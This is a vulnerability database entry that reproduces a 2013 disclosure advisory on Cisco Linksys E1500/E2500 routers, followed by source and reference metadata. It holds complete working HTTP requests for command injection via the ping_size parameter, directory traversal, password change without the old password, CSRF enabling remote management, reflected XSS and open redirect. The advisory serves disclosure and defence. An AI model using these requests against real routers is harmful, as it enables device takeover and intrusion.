VAR-201302-0530
Vulnerability from variot - Updated: 2022-05-17 02:00An attacker could exploit the vulnerability to access the system and other configuration files and perform unauthorized operations in the context of the user's session. An attacker can exploit a vulnerability to redirect a user to a potentially malicious website for a phishing attack. The vulnerability is due to a lack of proper validation of the ping_size parameter, which could allow an attacker to inject and execute arbitrary shell commands. An attacker of this vulnerability could modify the current password if it is not known. The attacker needs an authenticated browser to access it. The Cisco Linksys E1500 Router is a wireless router device. A directory traversal vulnerability exists in the Cisco Linksys E1500 Router. An attacker can send a specially crafted URL request containing a \"dot\" sequence (/.. /) in the next_page parameter to view any file on the system. A command-execution vulnerability 2. A security-bypass vulnerability 3. A cross-site request-forgery vulnerability 4. A directory-traversal vulnerability 6. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files.
The installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page.
Source: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80&app=vw&vw=1&login=1&json=...
============ Vulnerable Firmware Releases - e1500: ============
Firmware-Version: v1.0.00 - build 9 Feb. 17, 2011 Firmware-Version: v1.0.04 - build 2 M\xe4r. 8, 2012 Firmware-Version: v1.0.05 - build 1 Aug. 23, 2012
============ Vulnerable Firmware Releases - e2500: ============
Firmware Version: v1.0.03 (only tested for known OS command injection)
Other versions may also be affected. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. You need to be authenticated to the device or you have to find other methods for inserting the malicious commands.
Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Diagnostics.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 185 Connection: close
submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26ping%20192%2e168%2e178%2e102%26&ping_times=5&traceroute_ip=
Change the request methode from HTTP Post to HTTP GET makes the exploitation easier:
http://192.168.178.199/apply.cgi?submit_button=Diagnostics&change_action=gozila_cgi&submit_type=start_ping&action=&commit=0&ping_ip=1.1.1.1&ping_size=%26COMMAND%26&ping_times=5&traceroute_ip=
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png
* Directory traversal - tested on E1500:
=> parameter: next_page
Access local files of the device.
Request: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic YWRtaW46YWRtaW4= Content-Type: application/x-www-form-urlencoded Content-Length: 75
submit_type=wsc_method2&change_action=gozila_cgi&next_page=../../proc/version
Response: HTTP/1.1 200 Ok Server: httpd Date: Thu, 01 Jan 1970 00:00:29 GMT Cache-Control: no-cache Pragma: no-cache Expires: 0 Content-Type: text/html Connection: close
Linux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png
* For changing the current password there is no request of the current password - tested on E1500
With this vulnerability an attacker is able to change the current password without knowing it.
Example Request: POST /apply.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.1.1/Management.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 311
submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=admin&http_passwdConfirm=admin&_http_enable=1&web_wl_filter=0&remote_management=0&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
* CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500:
http:///apply.cgi?submit_button=Management&change_action=&action=Apply&PasswdModify=1&http_enable=1&https_enable=0&ctm404_enable=&remote_mgt_https=0&wait_time=4&need_reboot=0&http_passwd=password1&http_passwdConfirm=password1&_http_enable=1&web_wl_filter=0&remote_management=1&_remote_mgt_https=1&remote_upgrade=0&remote_ip_any=1&http_wanport=8080&nf_alg_sip=0&upnp_enable=1&upnp_config=1&upnp_internet_dis=0
* Reflected Cross Site Scripting - tested on E1500
=> Parameter: wait_time=3'%3balert('pwnd')//
Injecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input.
Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 300
submit_button=Wireless_Basic&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3'%3balert('pwnd')//&guest_ssid=Cisco-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png
* Redirection - tested on E1500
=> Paramter: submit_button=http://www.pwnd.pwnd%0a
Injecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input.
Example Exploit: POST /apply.cgi HTTP/1.1 Host: 192.168.178.199 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.199/Wireless_Basic.asp Authorization: Basic xxxx Content-Type: application/x-www-form-urlencoded Content-Length: 290
submit_button=http://www.pwnd.pwnd%0a&action=Apply&submit_type=&change_action=&next_page=&commit=1&wl0_nctrlsb=none&channel_24g=0&nbw_24g=20&wait_time=3&guest_ssid=Cisco01589-guest&wsc_security_mode=&wsc_smode=1&net_mode_24g=mixed&ssid_24g=Cisco01589&_wl0_nbw=20&_wl0_channel=0&closed_24g=0
Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png
============ Solution ============
No known solution available.
============ Credits ============
The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-004 Twitter: @s3cur1ty_de
============ Time Line: ============
October 2012 - discovered vulnerability 21.10.2012 - contacted Linksys with vulnerability details 23.10.2012 - Linksys requestet to check new firmware v1.0.05 build 1 27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1 27.10.2012 - contacted Linksys with vulnerabilty details in release v1.0.05 build 1 29.10.2012 - Linksys responded with case number 13.11.2012 - /me requested update of the progress 15.11.2012 - Linksys sends Beta Agreement 16.11.2012 - Linksys sends the Beta Firmware for testing 16.11.2012 - tested Beta version 18.11.2012 - informed Linksys about the results 30.11.2012 - reported the same OS Command injection vulnerability in model E2500 10.12.2012 - /me requested update of the progress 23.12.2012 - Update to Linksys with directory traversal vulnerability 09.01.2013 - Case closed 05.02.2013 - public release
===================== Advisory end =====================
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201302-0530",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "linksys e1500 router",
"scope": null,
"trust": 3.0,
"vendor": "cisco",
"version": null
},
{
"model": "linksys e1500/e2500 router",
"scope": null,
"trust": 0.6,
"vendor": "cisco",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Michael Messner",
"sources": [
{
"db": "BID",
"id": "57760"
},
{
"db": "PACKETSTORM",
"id": "120079"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
],
"trust": 1.0
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An attacker could exploit the vulnerability to access the system and other configuration files and perform unauthorized operations in the context of the user\u0027s session. An attacker can exploit a vulnerability to redirect a user to a potentially malicious website for a phishing attack. The vulnerability is due to a lack of proper validation of the ping_size parameter, which could allow an attacker to inject and execute arbitrary shell commands. An attacker of this vulnerability could modify the current password if it is not known. The attacker needs an authenticated browser to access it. The Cisco Linksys E1500 Router is a wireless router device. A directory traversal vulnerability exists in the Cisco Linksys E1500 Router. An attacker can send a specially crafted URL request containing a \\\"dot\\\" sequence (/.. /) in the next_page parameter to view any file on the system. A command-execution vulnerability\n2. A security-bypass vulnerability\n3. A cross-site request-forgery vulnerability\n4. A directory-traversal vulnerability\n6. It lets you access the Internet via a wireless connection or through one of its four switched ports. You can also use the Linksys E1500 to share resources, such as computers, printers and files. \n\nThe installation and use of the Linksys E1500 is easy with Cisco Connect, the software that is installed when you run the Setup CD. Likewise, advanced configuration of the Linksys E1500 is available through its web-based setup page. \n\nSource: http://homekb.cisco.com/Cisco2/ukp.aspx?pid=80\u0026app=vw\u0026vw=1\u0026login=1\u0026json=... \n\n============ Vulnerable Firmware Releases - e1500: ============\n\nFirmware-Version: v1.0.00 - build 9 Feb. 17, 2011\nFirmware-Version: v1.0.04 - build 2 M\\xe4r. 8, 2012\nFirmware-Version: v1.0.05 - build 1 Aug. 23, 2012\n\n============ Vulnerable Firmware Releases - e2500: ============\n\nFirmware Version: v1.0.03 (only tested for known OS command injection)\n\nOther versions may also be affected. It is possible to start a telnetd or upload and execute a backdoor to compromise the device. \nYou need to be authenticated to the device or you have to find other methods for inserting the malicious commands. \n\nExample Exploit:\nPOST /apply.cgi HTTP/1.1\nHost: 192.168.178.199\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nReferer: http://192.168.178.199/Diagnostics.asp\nAuthorization: Basic xxxx\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 185\nConnection: close\n\nsubmit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026action=\u0026commit=0\u0026ping_ip=1.1.1.1\u0026ping_size=%26ping%20192%2e168%2e178%2e102%26\u0026ping_times=5\u0026traceroute_ip=\n\nChange the request methode from HTTP Post to HTTP GET makes the exploitation easier:\n\nhttp://192.168.178.199/apply.cgi?submit_button=Diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026action=\u0026commit=0\u0026ping_ip=1.1.1.1\u0026ping_size=%26COMMAND%26\u0026ping_times=5\u0026traceroute_ip=\n\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-os-command-injection-1.0.05-rooted.png\n\n * Directory traversal - tested on E1500: \n\n=\u003e parameter: next_page\n\nAccess local files of the device. \n\nRequest:\nPOST /apply.cgi HTTP/1.1\nHost: 192.168.178.199\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nReferer: http://192.168.178.199/Wireless_Basic.asp\nAuthorization: Basic YWRtaW46YWRtaW4=\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 75\n\nsubmit_type=wsc_method2\u0026change_action=gozila_cgi\u0026next_page=../../proc/version\n\nResponse:\nHTTP/1.1 200 Ok\nServer: httpd\nDate: Thu, 01 Jan 1970 00:00:29 GMT\nCache-Control: no-cache\nPragma: no-cache\nExpires: 0\nContent-Type: text/html\nConnection: close\n\nLinux version 2.6.22 (cjc@t.sw3) (gcc version 4.2.3) #10 Thu Aug 23 11:16:42 HKT 2012\n\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-dir-traversal.png\n\n * For changing the current password there is no request of the current password - tested on E1500 \n\nWith this vulnerability an attacker is able to change the current password without knowing it. \n\nExample Request:\nPOST /apply.cgi HTTP/1.1\nHost: 192.168.1.1\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nReferer: http://192.168.1.1/Management.asp\nAuthorization: Basic xxxx\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 311\n\nsubmit_button=Management\u0026change_action=\u0026action=Apply\u0026PasswdModify=1\u0026http_enable=1\u0026https_enable=0\u0026ctm404_enable=\u0026remote_mgt_https=0\u0026wait_time=4\u0026need_reboot=0\u0026http_passwd=admin\u0026http_passwdConfirm=admin\u0026_http_enable=1\u0026web_wl_filter=0\u0026remote_management=0\u0026nf_alg_sip=0\u0026upnp_enable=1\u0026upnp_config=1\u0026upnp_internet_dis=0\n\n * CSRF for changing the password without knowing the current one and the attacker is able to activate the remote management - tested on E1500: \n\nhttp://\u003cIP\u003e/apply.cgi?submit_button=Management\u0026change_action=\u0026action=Apply\u0026PasswdModify=1\u0026http_enable=1\u0026https_enable=0\u0026ctm404_enable=\u0026remote_mgt_https=0\u0026wait_time=4\u0026need_reboot=0\u0026http_passwd=password1\u0026http_passwdConfirm=password1\u0026_http_enable=1\u0026web_wl_filter=0\u0026remote_management=1\u0026_remote_mgt_https=1\u0026remote_upgrade=0\u0026remote_ip_any=1\u0026http_wanport=8080\u0026nf_alg_sip=0\u0026upnp_enable=1\u0026upnp_config=1\u0026upnp_internet_dis=0\n\n * Reflected Cross Site Scripting - tested on E1500 \n\n=\u003e Parameter: wait_time=3\u0027%3balert(\u0027pwnd\u0027)//\n\nInjecting scripts into the parameter wait_time reveals that this parameter is not properly validated for malicious input. \n\nExample Exploit:\nPOST /apply.cgi HTTP/1.1\nHost: 192.168.178.199\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nReferer: http://192.168.178.199/Wireless_Basic.asp\nAuthorization: Basic xxxx\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 300\n\nsubmit_button=Wireless_Basic\u0026action=Apply\u0026submit_type=\u0026change_action=\u0026next_page=\u0026commit=1\u0026wl0_nctrlsb=none\u0026channel_24g=0\u0026nbw_24g=20\u0026wait_time=3\u0027%3balert(\u0027pwnd\u0027)//\u0026guest_ssid=Cisco-guest\u0026wsc_security_mode=\u0026wsc_smode=1\u0026net_mode_24g=mixed\u0026ssid_24g=Cisco\u0026_wl0_nbw=20\u0026_wl0_channel=0\u0026closed_24g=0\n\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-XSS.png\n\n * Redirection - tested on E1500 \n\n=\u003e Paramter: submit_button=http://www.pwnd.pwnd%0a\n\nInjecting URLs into the parameter submit_button reveals that this parameter is not properly validated for malicious input. \n\nExample Exploit:\nPOST /apply.cgi HTTP/1.1\nHost: 192.168.178.199\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3\nAccept-Encoding: gzip, deflate\nProxy-Connection: keep-alive\nReferer: http://192.168.178.199/Wireless_Basic.asp\nAuthorization: Basic xxxx\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 290\n\nsubmit_button=http://www.pwnd.pwnd%0a\u0026action=Apply\u0026submit_type=\u0026change_action=\u0026next_page=\u0026commit=1\u0026wl0_nctrlsb=none\u0026channel_24g=0\u0026nbw_24g=20\u0026wait_time=3\u0026guest_ssid=Cisco01589-guest\u0026wsc_security_mode=\u0026wsc_smode=1\u0026net_mode_24g=mixed\u0026ssid_24g=Cisco01589\u0026_wl0_nbw=20\u0026_wl0_channel=0\u0026closed_24g=0\n\nScreenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/E1500-redirect.png\n\n============ Solution ============\n\nNo known solution available. \n\n============ Credits ============\n\nThe vulnerability was discovered by Michael Messner\nMail: devnull#at#s3cur1ty#dot#de\nWeb: http://www.s3cur1ty.de\nAdvisory URL: http://www.s3cur1ty.de/m1adv2013-004\nTwitter: @s3cur1ty_de\n\n============ Time Line: ============\n\nOctober 2012 - discovered vulnerability\n21.10.2012 - contacted Linksys with vulnerability details\n23.10.2012 - Linksys requestet to check new firmware v1.0.05 build 1\n27.10.2012 - Tested and verified all vulnerabilities in release v1.0.05 build 1\n27.10.2012 - contacted Linksys with vulnerabilty details in release v1.0.05 build 1\n29.10.2012 - Linksys responded with case number\n13.11.2012 - /me requested update of the progress\n15.11.2012 - Linksys sends Beta Agreement\n16.11.2012 - Linksys sends the Beta Firmware for testing\n16.11.2012 - tested Beta version\n18.11.2012 - informed Linksys about the results\n30.11.2012 - reported the same OS Command injection vulnerability in model E2500\n10.12.2012 - /me requested update of the progress\n23.12.2012 - Update to Linksys with directory traversal vulnerability\n09.01.2013 - Case closed\n05.02.2013 - public release\n\n===================== Advisory end =====================\n",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"db": "BID",
"id": "57760"
},
{
"db": "PACKETSTORM",
"id": "120079"
}
],
"trust": 3.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "57760",
"trust": 4.5
},
{
"db": "PACKETSTORM",
"id": "120079",
"trust": 3.7
},
{
"db": "CNVD",
"id": "CNVD-2013-00966",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-00965",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-00904",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-00962",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-00964",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2013-00963",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201302-141",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"db": "BID",
"id": "57760"
},
{
"db": "PACKETSTORM",
"id": "120079"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
]
},
"id": "VAR-201302-0530",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
}
],
"trust": 4.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 3.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
}
]
},
"last_update_date": "2022-05-17T02:00:07.574000Z",
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.0,
"url": "http://packetstormsecurity.com/files/120079/linksyse1500e2500-execxssxsrftraversal.txthttp"
},
{
"trust": 0.6,
"url": "http://packetstormsecurity.com/files/120079/linksyse1500e2500-execxssxsrftraversal.txt"
},
{
"trust": 0.6,
"url": "http://www.securityfocus.com/bid/57760"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/e1500-dir-traversal.png"
},
{
"trust": 0.1,
"url": "http://192.168.178.199/apply.cgi?submit_button=diagnostics\u0026change_action=gozila_cgi\u0026submit_type=start_ping\u0026action=\u0026commit=0\u0026ping_ip=1.1.1.1\u0026ping_size=%26command%26\u0026ping_times=5\u0026traceroute_ip="
},
{
"trust": 0.1,
"url": "http://192.168.178.199/diagnostics.asp"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/e1500-redirect.png"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/e1500-xss.png"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/management.asp"
},
{
"trust": 0.1,
"url": "http://\u003cip\u003e/apply.cgi?submit_button=management\u0026change_action=\u0026action=apply\u0026passwdmodify=1\u0026http_enable=1\u0026https_enable=0\u0026ctm404_enable=\u0026remote_mgt_https=0\u0026wait_time=4\u0026need_reboot=0\u0026http_passwd=password1\u0026http_passwdconfirm=password1\u0026_http_enable=1\u0026web_wl_filter=0\u0026remote_management=1\u0026_remote_mgt_https=1\u0026remote_upgrade=0\u0026remote_ip_any=1\u0026http_wanport=8080\u0026nf_alg_sip=0\u0026upnp_enable=1\u0026upnp_config=1\u0026upnp_internet_dis=0"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/e1500-os-command-injection-1.0.05-rooted.png"
},
{
"trust": 0.1,
"url": "http://www.pwnd.pwnd%0a"
},
{
"trust": 0.1,
"url": "http://192.168.178.199/wireless_basic.asp"
},
{
"trust": 0.1,
"url": "http://www.s3cur1ty.de/m1adv2013-004"
},
{
"trust": 0.1,
"url": "http://www.pwnd.pwnd%0a\u0026action=apply\u0026submit_type=\u0026change_action=\u0026next_page=\u0026commit=1\u0026wl0_nctrlsb=none\u0026channel_24g=0\u0026nbw_24g=20\u0026wait_time=3\u0026guest_ssid=cisco01589-guest\u0026wsc_security_mode=\u0026wsc_smode=1\u0026net_mode_24g=mixed\u0026ssid_24g=cisco01589\u0026_wl0_nbw=20\u0026_wl0_channel=0\u0026closed_24g=0"
},
{
"trust": 0.1,
"url": "http://homekb.cisco.com/cisco2/ukp.aspx?pid=80\u0026app=vw\u0026vw=1\u0026login=1\u0026json=..."
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"db": "PACKETSTORM",
"id": "120079"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"db": "BID",
"id": "57760"
},
{
"db": "PACKETSTORM",
"id": "120079"
},
{
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00966"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"date": "2013-02-08T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"date": "2013-02-06T00:00:00",
"db": "BID",
"id": "57760"
},
{
"date": "2013-02-05T23:42:27",
"db": "PACKETSTORM",
"id": "120079"
},
{
"date": "2013-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
